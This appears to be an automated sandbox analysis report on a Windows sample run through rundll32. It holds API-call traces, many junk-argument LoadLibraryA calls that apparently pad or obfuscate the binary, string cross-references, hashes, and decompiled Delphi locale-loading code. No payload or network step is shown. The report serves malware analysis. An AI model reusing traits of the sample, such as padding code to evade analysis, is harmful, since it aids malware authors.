LoadLibraryA.KERNEL32(fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad), ref: 00E7B850
LoadLibraryA.KERNEL32(fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad), ref: 00E7B85A
LoadLibraryA.KERNEL32(fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad), ref: 00E7B864
LoadLibraryA.KERNEL32(fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad), ref: 00E7B86E
LoadLibraryA.KERNEL32(fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad), ref: 00E7B878
LoadLibraryA.KERNEL32(fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad), ref: 00E7B882
LoadLibraryA.KERNEL32(fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad), ref: 00E7B88C
LoadLibraryA.KERNEL32(fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad), ref: 00E7B896
LoadLibraryA.KERNEL32(fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad), ref: 00E7B8A0
LoadLibraryA.KERNEL32(fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad), ref: 00E7B8AA
LoadLibraryA.KERNEL32(fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad), ref: 00E7B8B4
LoadLibraryA.KERNEL32(fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad), ref: 00E7B8BE
LoadLibraryA.KERNEL32(fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad), ref: 00E7B8C8
LoadLibraryA.KERNEL32(fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad), ref: 00E7B8D2
LoadLibraryA.KERNEL32(fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad), ref: 00E7B8DC
LoadLibraryA.KERNEL32(fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad), ref: 00E7B8E6
LoadLibraryA.KERNEL32(fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad), ref: 00E7B8F0
LoadLibraryA.KERNEL32(fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad), ref: 00E7B8FA
LoadLibraryA.KERNEL32(fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad), ref: 00E7B904
LoadLibraryA.KERNEL32(fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad), ref: 00E7B90E
LoadLibraryA.KERNEL32(fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad), ref: 00E7B918
LoadLibraryA.KERNEL32(fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad), ref: 00E7B922
LoadLibraryA.KERNEL32(fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad), ref: 00E7B92C
LoadLibraryA.KERNEL32(fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad), ref: 00E7B936
LoadLibraryA.KERNEL32(fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad), ref: 00E7B940
LoadLibraryA.KERNEL32(fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad), ref: 00E7B94A
LoadLibraryA.KERNEL32(fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad), ref: 00E7B954
LoadLibraryA.KERNEL32(fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad), ref: 00E7B95E
LoadLibraryA.KERNEL32(fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad), ref: 00E7B968
LoadLibraryA.KERNEL32(fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad), ref: 00E7B972
LoadLibraryA.KERNEL32(fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad), ref: 00E7B97C
LoadLibraryA.KERNEL32(fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad), ref: 00E7B986
LoadLibraryA.KERNEL32(fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad), ref: 00E7B990
LoadLibraryA.KERNEL32(fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad), ref: 00E7B99A
LoadLibraryA.KERNEL32(fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad), ref: 00E7B9A4
LoadLibraryA.KERNEL32(fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad), ref: 00E7B9AE
LoadLibraryA.KERNEL32(fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad), ref: 00E7B9B8
LoadLibraryA.KERNEL32(fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad), ref: 00E7B9C2
LoadLibraryA.KERNEL32(fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad), ref: 00E7B9CC
LoadLibraryA.KERNEL32(fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad), ref: 00E7B9D6
LoadLibraryA.KERNEL32(fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad), ref: 00E7B9E0
LoadLibraryA.KERNEL32(fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad), ref: 00E7B9EA
LoadLibraryA.KERNEL32(fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad), ref: 00E7B9F4
LoadLibraryA.KERNEL32(fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad), ref: 00E7B9FE
LoadLibraryA.KERNEL32(fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad), ref: 00E7BA08
LoadLibraryA.KERNEL32(fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad), ref: 00E7BA12
LoadLibraryA.KERNEL32(fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad), ref: 00E7BA1C
LoadLibraryA.KERNEL32(fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad), ref: 00E7BA26
LoadLibraryA.KERNEL32(fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad), ref: 00E7BA30
LoadLibraryA.KERNEL32(fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad), ref: 00E7BA3A
LoadLibraryA.KERNEL32(fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad), ref: 00E7BA44
LoadLibraryA.KERNEL32(fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad), ref: 00E7BA4E
LoadLibraryA.KERNEL32(fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad), ref: 00E7BA58
LoadLibraryA.KERNEL32(fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad), ref: 00E7BA62
LoadLibraryA.KERNEL32(fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad), ref: 00E7BA6C
LoadLibraryA.KERNEL32(fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad), ref: 00E7BA76
LoadLibraryA.KERNEL32(fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad), ref: 00E7BA80
LoadLibraryA.KERNEL32(fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad), ref: 00E7BA8A
LoadLibraryA.KERNEL32(fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad), ref: 00E7BA94
LoadLibraryA.KERNEL32(fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad), ref: 00E7BA9E
LoadLibraryA.KERNEL32(fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad), ref: 00E7BAA8
LoadLibraryA.KERNEL32(fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad), ref: 00E7BAB2
LoadLibraryA.KERNEL32(fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad), ref: 00E7BABC
LoadIconA.USER32(00000000,0000113C), ref: 00E7BAC8
StrokePath.GDI32(0000000C), ref: 00E7BAEB
VirtualAlloc.KERNELBASE(00000000,-00E7FF10), ref: 00E7BBBA
VirtualAlloc.KERNELBASE(00000000,-00E7FF10), ref: 00E7BBE9
StrokePath.GDI32(0000000C), ref: 00E7BD1F
StrokePath.GDI32(0000000C), ref: 00E7BD35
StrokePath.GDI32(0000000C), ref: 00E7BD63
StrokePath.GDI32(0000000C), ref: 00E7BD6F

Strings

T, xrefs: 00E7BB69
p, xrefs: 00E7C1A4
(e, xrefs: 00E7BB91, 00E7BBBA, 00E7BBE9
q, xrefs: 00E7C224
fadfadfadad, xrefs: 00E7BDF8, 00E7B459, 00E7B463, 00E7B46D, 00E7B477, 00E7B481, 00E7B48B, 00E7B495, 00E7B49F, 00E7B4A9, 00E7B4B3, 00E7B4BD, 00E7B4C7, 00E7B4D1, 00E7B4DB, 00E7B4E5, 00E7B4EF, 00E7B4F9, 00E7B503, 00E7B50D, 00E7B517, 00E7B521, 00E7B52B, 00E7B535, 00E7B53F, 00E7B549, 00E7B553, 00E7B55D, 00E7B567, 00E7B571, 00E7B57B, 00E7B585, 00E7B58F, 00E7B599, 00E7B5A3, 00E7B5AD, 00E7B5B7, 00E7B5C1, 00E7B5CB, 00E7B5D5, 00E7B5DF, 00E7B5E9, 00E7B5F3, 00E7B5FD, 00E7B607, 00E7B611, 00E7B61B, 00E7B625, 00E7B62F, 00E7B639, 00E7B643, 00E7B64D, 00E7B657, 00E7B661, 00E7B66B, 00E7B675, 00E7B67F, 00E7B689, 00E7B693, 00E7B69D, 00E7B6A7, 00E7B6B1, 00E7B6BB, 00E7B6C5, 00E7B6CF, 00E7B6D9, 00E7B6E3, 00E7B6ED, 00E7B6F7, 00E7B701, 00E7B70B, 00E7B715, 00E7B71F, 00E7B729, 00E7B733, 00E7B73D, 00E7B747, 00E7B751, 00E7B75B, 00E7B765, 00E7B76F, 00E7B779, 00E7B783, 00E7B78D, 00E7B797, 00E7B7A1, 00E7B7AB, 00E7B7B5, 00E7B7BF, 00E7B7C9, 00E7B7D3, 00E7B7DD, 00E7B7E7, 00E7B7F1, 00E7B7FB, 00E7B805, 00E7B80F, 00E7B819, 00E7B823, 00E7B82D, 00E7B837, 00E7B841, 00E7B84B, 00E7B855, 00E7B85F, 00E7B869, 00E7B873, 00E7B87D, 00E7B887, 00E7B891, 00E7B89B, 00E7B8A5, 00E7B8AF, 00E7B8B9, 00E7B8C3, 00E7B8CD, 00E7B8D7, 00E7B8E1, 00E7B8EB, 00E7B8F5, 00E7B8FF, 00E7B909, 00E7B913, 00E7B91D, 00E7B927, 00E7B931, 00E7B93B, 00E7B945, 00E7B94F, 00E7B959, 00E7B963, 00E7B96D, 00E7B977, 00E7B981, 00E7B98B, 00E7B995, 00E7B99F, 00E7B9A9, 00E7B9B3, 00E7B9BD, 00E7B9C7, 00E7B9D1, 00E7B9DB, 00E7B9E5, 00E7B9EF, 00E7B9F9, 00E7BA03, 00E7BA0D, 00E7BA17, 00E7BA21, 00E7BA2B, 00E7BA35, 00E7BA3F, 00E7BA49, 00E7BA53, 00E7BA5D, 00E7BA67, 00E7BA71, 00E7BA7B, 00E7BA85, 00E7BA8F, 00E7BA99, 00E7BAA3, 00E7BAAD, 00E7BAB7

Memory Dump Source

Source File: 00000003.00000002.315530720.0000000000E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000003.00000002.315524545.0000000000E10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.315612504.0000000000E7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.315631404.0000000000E83000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e10000_rundll32.jbxd

Similarity

API ID: Load$Library$PathStroke$AllocVirtual$Icon
String ID: (e$fadfadfadad$p$q$T
API String ID: 140743564-3308166071
Opcode ID: 903dbeb840560f03be5edde9b888078b9a264eebd0d239b5381d74c589540802
Instruction ID: 6da8e8adfbd2f5fd27a81c0bdecb71d076a38102c1a62cb606728a5b17dd7b6b
Opcode Fuzzy Hash: 903dbeb840560f03be5edde9b888078b9a264eebd0d239b5381d74c589540802
Instruction Fuzzy Hash: 7862823028C7809FD321B7799C16A883BA07F56709716F099F978FA4A3DB9944C98773

Uniqueness

Uniqueness Score: -1.00%

Function 00E1557C Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 184
registrystringlibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 66%

			E00E1557C(intOrPtr __eax) {
				intOrPtr _v8;
				void* _v12;
				char _v15;
				char _v17;
				char _v18;
				char _v22;
				int _v28;
				char _v289;
				long _t44;
				long _t61;
				long _t63;
				CHAR* _t70;
				CHAR* _t72;
				struct HINSTANCE__* _t78;
				struct HINSTANCE__* _t84;
				char* _t94;
				void* _t95;
				intOrPtr _t99;
				struct HINSTANCE__* _t107;
				void* _t110;
				void* _t112;
				intOrPtr _t113;

				_t110 = _t112;
				_t113 = _t112 + 0xfffffee0;
				_v8 = __eax;
				GetModuleFileNameA(0,  &_v289, 0x105);
				_v22 = 0;
				_t44 = RegOpenKeyExA(0x80000001, "Software\\Borland\\Locales", 0, 0xf0019,  &_v12); // executed
				if(_t44 == 0) {
					L3:
					_push(_t110);
					_push(0xe15681);
					_push( *[fs:eax]);
					 *[fs:eax] = _t113;
					_v28 = 5;
					E00E153C4( &_v289, 0x105);
					if(RegQueryValueExA(_v12,  &_v289, 0, 0,  &_v22,  &_v28) != 0 && RegQueryValueExA(_v12, E00E157E8, 0, 0,  &_v22,  &_v28) != 0) {
						_v22 = 0;
					}
					_v18 = 0;
					_pop(_t99);
					 *[fs:eax] = _t99;
					_push(E00E15688);
					return RegCloseKey(_v12);
				} else {
					_t61 = RegOpenKeyExA(0x80000002, "Software\\Borland\\Locales", 0, 0xf0019,  &_v12); // executed
					if(_t61 == 0) {
						goto L3;
					} else {
						_t63 = RegOpenKeyExA(0x80000001, "Software\\Borland\\Delphi\\Locales", 0, 0xf0019,  &_v12); // executed
						if(_t63 != 0) {
							_push(0x105);
							_push(_v8);
							_push( &_v289);
							L00E112A4();
							GetLocaleInfoA(GetThreadLocale(), 3,  &_v17, 5); // executed
							_t107 = 0;
							if(_v289 != 0 && (_v17 != 0 || _v22 != 0)) {
								_t70 =  &_v289;
								_push(_t70);
								L00E112AC();
								_t94 = _t70 +  &_v289;
								L12:
								if( *_t94 != 0x2e && _t94 !=  &_v289) {
									_t94 = _t94 - 1;
									goto L12;
								}
								_t72 =  &_v289;
								if(_t94 != _t72) {
									_t95 = _t94 + 1;
									if(_v22 != 0) {
										_push(0x105 - _t95 - _t72);
										_push( &_v22);
										_push(_t95);
										L00E112A4();
										_t107 = LoadLibraryExA( &_v289, 0, 2);
									}
									if(_t107 == 0 && _v17 != 0) {
										_push(0x105 - _t95 -  &_v289);
										_push( &_v17);
										_push(_t95);
										L00E112A4();
										_t78 = LoadLibraryExA( &_v289, 0, 2); // executed
										_t107 = _t78;
										if(_t107 == 0) {
											_v15 = 0;
											_push(0x105 - _t95 -  &_v289);
											_push( &_v17);
											_push(_t95);
											L00E112A4();
											_t84 = LoadLibraryExA( &_v289, 0, 2); // executed
											_t107 = _t84;
										}
									}
								}
							}
							return _t107;
						} else {
							goto L3;
						}
					}
				}
			}

0x00e1557d
0x00e1557f
0x00e15587
0x00e15598
0x00e1559d
0x00e155b6
0x00e155bd
0x00e155ff
0x00e15601
0x00e15602
0x00e15607
0x00e1560a
0x00e1560d
0x00e1561f
0x00e15642
0x00e15662
0x00e15662
0x00e15666
0x00e1566c
0x00e1566f
0x00e15672
0x00e15680
0x00e155bf
0x00e155d4
0x00e155db
0x00000000
0x00e155dd
0x00e155f2
0x00e155f9
0x00e15688
0x00e15690
0x00e15697
0x00e15698
0x00e156ab
0x00e156b0
0x00e156b9
0x00e156cf
0x00e156d5
0x00e156d6
0x00e156e3
0x00e156e8
0x00e156eb
0x00e156e7
0x00000000
0x00e156e7
0x00e156f7
0x00e156ff
0x00e15705
0x00e1570a
0x00e15717
0x00e1571b
0x00e1571c
0x00e1571d
0x00e15732
0x00e15732
0x00e15736
0x00e1574f
0x00e15753
0x00e15754
0x00e15755
0x00e15765
0x00e1576a
0x00e1576e
0x00e15770
0x00e15785
0x00e15789
0x00e1578a
0x00e1578b
0x00e1579b
0x00e157a0
0x00e157a0
0x00e1576e
0x00e15736
0x00e156ff
0x00e157a9
0x00000000
0x00000000
0x00000000
0x00e155f9
0x00e155db

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000105,?,00E7C0A4), ref: 00E15598
RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,?,00E7C0A4), ref: 00E155B6
RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,?,00E7C0A4), ref: 00E155D4
RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 00E155F2
RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,00E15681,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 00E1563B
RegQueryValueExA.ADVAPI32(?,00E157E8,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,00E15681,?,80000001), ref: 00E15659
RegCloseKey.ADVAPI32(?,00E15688,00000000,?,?,00000000,00E15681,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 00E1567B
lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 00E15698
GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 00E156A5
